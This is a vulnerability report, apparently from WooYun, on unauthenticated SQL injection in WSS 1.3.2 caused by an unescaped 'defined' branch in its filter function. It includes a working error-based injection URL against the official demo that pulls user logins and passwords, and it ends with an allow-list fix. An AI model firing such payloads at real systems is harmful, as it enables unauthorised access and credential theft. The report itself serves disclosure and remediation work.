### Brief description:

Multiple SQL injections in the latest WSS release give direct access to database contents (part three). Demonstrated on the official demo. Several injection points exist; this report traces them to one root cause and summarises them together.

### Details:

WSS latest version 1.3.2. Several injection points share the same root cause; this report summarises them and shows how to quickly locate every instance of the same defect.

```
These injections require no privileges: any user can trigger them.
```

Vulnerability analysis:

[WooYun: WSS最新版某处SQL注入直接获取数据二(两处)](http://www.wooyun.org/bugs/wooyun-2014-084139)

The previous report (WSS latest version SQL injection with direct data access, part two, two instances) already walked through the mechanism: a design flaw in the global filter function leads to SQL injection.

```php
// WSS global filter helper as shipped (vulnerable code from the page, unchanged).
if (!function_exists("GetSQLValueString")) {
    function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "")
    {
        if (PHP_VERSION < 6) {
            $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;
        }

        // Escaping is applied to $theValue only.
        $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

        switch ($theType) {
            case "text":
                $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
                break;
            case "long":
            case "int":
                $theValue = ($theValue != "") ? intval($theValue) : "NULL";
                break;
            case "double":
                $theValue = ($theValue != "") ? doubleval($theValue) : "NULL";
                break;
            case "date":
                $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
                break;
            case "defined":
                // Returns the caller-supplied $theDefinedValue, which was never escaped.
                $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
                break;
        }
        return $theValue;
    }
}
```

Look here:

```php
case "defined":
    $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
```

When execution reaches this branch the function performs no processing at all: the escaping above was applied to `$theValue`, but the branch returns `$theDefinedValue`, the original unescaped string, as long as the input is non-empty. The application uses the `defined` type in many places, so the filter is ineffective there.

Locating the vulnerabilities:

Search the whole code base for:

```
"defined",
```

This yields 6 vulnerable locations:

![3.png](https://images.seebug.org/upload/201411/211728428813a4f7a754ce4009baa01742f3ed42.png)

default_user.php was analysed in detail in the previous report. Here we look at control_project.php and control_task.php, using control_task.php as the example:

```php
......
// Sort column and direction are taken straight from the query string.
$sortlist = "csa_last_update";
if (isset($_GET['sort'])) {
    $sortlist = $_GET['sort'];
}
$orderlist = "DESC";
if (isset($_GET['order'])) {
    $orderlist = $_GET['order'];
}
......
$query_Recordset1 = sprintf("SELECT *, tk_project.project_name as project_name_prt, tk_user1.tk_display_name as tk_display_name1, tk_user2.tk_display_name as tk_display_name2 FROM tk_task inner join tk_task_tpye on tk_task.csa_type=tk_task_tpye.id inner join tk_project on tk_task.csa_project=tk_project.id inner join tk_user as tk_user1 on tk_task.csa_to_user=tk_user1.uid inner join tk_user as tk_user2 on tk_task.csa_from_user=tk_user2.uid inner join tk_status on tk_task.csa_remark2=tk_status.id $where (tk_task.csa_plan_st <=%s AND tk_task.csa_plan_et >=%s OR tk_task.csa_plan_st <=%s AND tk_task.csa_plan_et >=%s OR tk_task.csa_plan_st >=%s AND tk_task.csa_plan_et <=%s) ORDER BY %s %s",
    GetSQLValueString($startday, "text"),
    GetSQLValueString($startday, "text"),
    GetSQLValueString($endday, "text"),
    GetSQLValueString($endday, "text"),
    GetSQLValueString($startday, "text"),
    GetSQLValueString($endday, "text"),
    // "defined" type: $sortlist and $orderlist are returned verbatim into ORDER BY.
    GetSQLValueString($sortlist, "defined", $sortlist, "NULL"),
    GetSQLValueString($orderlist, "defined", $orderlist, "NULL")
);
$query_limit_Recordset1 = sprintf("%s LIMIT %d, %d", $query_Recordset1, $startRow_Recordset1, $maxRows_Recordset1);
// Query errors are printed to the page, which is what makes error-based extraction possible.
$Recordset1 = mysql_query($query_limit_Recordset1, $tankdb) or die(mysql_error());
$row_Recordset1 = mysql_fetch_assoc($Recordset1);
```

The root cause is the same as in the previous report: the `sort` and `order` parameters go through `GetSQLValueString` with the `defined` type, so the filter has no effect and both values land unmodified in the `ORDER BY` clause.

Requesting control_project.php and control_task.php directly does not work; they error out, and the error message discloses the absolute installation path:

![4.png](https://images.seebug.org/upload/201411/21173055ebdd176997f288d1f159401fe1e34a38.png)

So they must be included from somewhere else. Search the code base again for:

```
control_project
```

It is included by /project.php:

```php
<div class="pagemargin">
<?php require('control_project.php'); ?>
</div>
```

Then search for:

```
control_task
```

It is included by /index.php:

```php
<div class="pagemargin">
<?php require('control_task.php'); ?>
</div>
```

Because the includes sit in index.php and project.php, and neither control_project.php nor control_task.php applies any authorization check, every user can reach the vulnerable code. Below we test it on the official demo.

### Proof of vulnerability:

The official demo runs the latest stable release, 1.3.2.

```
http://wssys.sinaapp.com/project.php?sort=uid%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&order=222222%27
```

Decoded, the `sort` parameter is:

```sql
uid and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x23,tk_user_login,0x23,tk_user_pass) from tk_user limit 0,1))a from information_schema.tables group by a)b)#
```

This is the standard error-based technique: grouping on a key built from `floor(rand(0)*2)` and the target data makes MySQL raise a "Duplicate entry ... for key 'group_key'" error whose text contains the first row's `tk_user_login` and `tk_user_pass` (separated by `0x23`, i.e. `#`). Because the page runs the query with `or die(mysql_error())`, that error text is echoed straight to the response. The trailing `#` comments out the rest of the `ORDER BY` clause, so the `order` value (`222222'`) is never parsed.

![2.png](https://images.seebug.org/upload/201411/2117375001f9a4da3b66f6d6bd51cc978ec39495.png)

![1.png](https://images.seebug.org/upload/201411/21173803ca48996b92e2d053cf31434fed43a910.png)
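The fix that follows is an added example written for this report; it is not WSS code. Escaping cannot fix this bug: `ORDER BY` takes identifiers and keywords, which are not quoted, so the only safe handling for `sort` and `order` is an allow-list. The column list below is an assumption built from the `SELECT` shown above, and `safe_order_by` and `GetSQLIdentifier` are hypothetical names for the replacement of the `defined` branch.

```php
<?php
// Added example for this report, not part of WSS. Replaces the "defined" pass-through
// that control_task.php / control_project.php rely on for the sort/order parameters.

// Assumption: columns a task list may be sorted by, taken from the SELECT in the report.
const TASK_SORT_COLUMNS = [
    'csa_last_update',
    'csa_plan_st',
    'csa_plan_et',
    'project_name_prt',
    'tk_display_name1',
    'tk_display_name2',
];

/**
 * Build "ORDER BY `col` DIR" from untrusted input.
 * Identifiers are validated against $allowed, never escaped; an unknown column
 * falls back to $default and anything other than ASC becomes DESC.
 */
function safe_order_by(?string $sort, ?string $order, array $allowed, string $default): string
{
    $column    = in_array($sort, $allowed, true) ? $sort : $default;
    $direction = strtoupper((string) $order) === 'ASC' ? 'ASC' : 'DESC';
    return "ORDER BY `{$column}` {$direction}";
}

/**
 * Drop-in replacement for GetSQLValueString($v, "defined", $v, "NULL"):
 * return the backtick-quoted identifier only when it is on the allow-list,
 * otherwise the not-defined value, so raw request data never reaches the SQL.
 */
function GetSQLIdentifier(string $theValue, array $allowed, string $theNotDefinedValue = 'NULL'): string
{
    return in_array($theValue, $allowed, true) ? "`{$theValue}`" : $theNotDefinedValue;
}

// Constructed inputs: the payload shape from the proof above, then a legitimate request.
$attack_sort  = "uid and (select 1 from (select count(*),concat(floor(rand(0)*2),"
              . "(select concat(0x23,tk_user_login,0x23,tk_user_pass) from tk_user limit 0,1))a "
              . "from information_schema.tables group by a)b)#";
$attack_order = "222222'";

// The injected string is not on the allow-list, so the default column is used
// and the quote in $attack_order is discarded along with the whole value.
echo safe_order_by($attack_sort, $attack_order, TASK_SORT_COLUMNS, 'csa_last_update'), PHP_EOL;

// A normal request keeps working.
echo safe_order_by('csa_plan_st', 'asc', TASK_SORT_COLUMNS, 'csa_last_update'), PHP_EOL;

// Same idea applied to the original call site's shape.
echo GetSQLIdentifier($attack_sort, TASK_SORT_COLUMNS), PHP_EOL;   // NULL
echo GetSQLIdentifier('csa_plan_et', TASK_SORT_COLUMNS), PHP_EOL;  // `csa_plan_et`
```

In the `sprintf` call of control_task.php the two `defined` arguments would be replaced by a single `%s` filled from `safe_order_by($_GET['sort'] ?? null, $_GET['order'] ?? null, TASK_SORT_COLUMNS, 'csa_last_update')`. The same change applies to every one of the 6 `"defined",` hits found by the global search, each with its own column list, and the `or die(mysql_error())` should be replaced by logging so that query errors are no longer echoed to users.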